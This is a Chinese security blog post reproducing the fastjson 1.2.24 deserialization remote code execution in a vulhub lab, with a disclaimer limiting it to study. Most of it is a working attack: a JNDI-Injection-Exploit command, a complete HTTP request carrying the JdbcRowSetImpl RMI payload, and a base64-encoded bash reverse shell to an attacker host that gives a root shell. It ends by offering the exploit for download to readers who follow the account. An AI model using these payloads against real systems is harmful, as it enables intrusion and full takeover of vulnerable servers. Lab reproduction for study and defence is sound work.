漏洞复现-fastjson 1.2.24-rce
2022-12-13 09:34:33 Author: 浪飒sec(查看原文) 阅读量:41 收藏

免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

漏洞概述

fastjson 1.2.24 反序列化导致任意命令执行漏洞,漏洞影响范围:fastjson<=1.2.24。

靶场环境

vulhub搭建参考:

Vulnhub 靶场环境搭建

进入到vulbub靶场的/vulhub/fastjson/1.2.24-rce目录

使用命令:

docker-compose up -d #启动镜像,整个过程比较久,耐心等待
环境搭建完毕,访问http://192.168.0.140:8090/,得到如下页面

验证漏洞的存在

抓包,修改数据包,就可以更新服务器端的信息

GET修改成POST,再添加

Content-Type:application/json{"name":"hello","age":20}

命令执行

1、利用工具自动开启RMI和LDAP服务以及发布Exploit类

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "要执行的命令" -A "vpsip"java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/access" -A "192.168.0.1"

2、根据启动的服务构造数据包

POST / HTTP/1.1Host: 192.168.0.140:8090Accept-Encoding: gzip, deflateAccept: /Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 160 {  "b":{    "@type":"com.sun.rowset.JdbcRowSetImpl",    "dataSourceName":"rmi://192.168.0.1:1099/cstvrv",    "autoCommit":true  }}

进入后台查看命令是否执行成功,命令成功执行,创建/tmp/access文件

反弹shell

构造命令,反弹shell

bash-i >& /dev/tcp/192.168.0.1/99990>&1-> YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS85OTk5IDA+JjEg  #base64编码java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS85OTk5IDA+JjEg}|{base64,-d}|{bash,-i}" -A "192.168.0.1"

同样的根据启动的服务构造数据包进行发送,然后以下两个结果会先弹出

过一会儿,反弹shell就会弹出,root权限,能够正常执行命令

获取exp

关注浪飒sec回复221213获取exp下载地址

历史推荐

漏洞复现-Tomcat8弱口令&&后台Getshell

漏洞复现——CVE-2021-44228

漏洞复现——php inclusion

漏洞复现——CVE-2017-5645


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1ODM1MjUxMQ==&mid=2247490530&idx=1&sn=649b69099359188121be753c02e03514&chksm=ea082ff2dd7fa6e4b3d1ffd4f2309a6f3ed5262339380024eeccb090cd5c57df2cb99785f50c#rd
如有侵权请联系:admin#unsafe.sh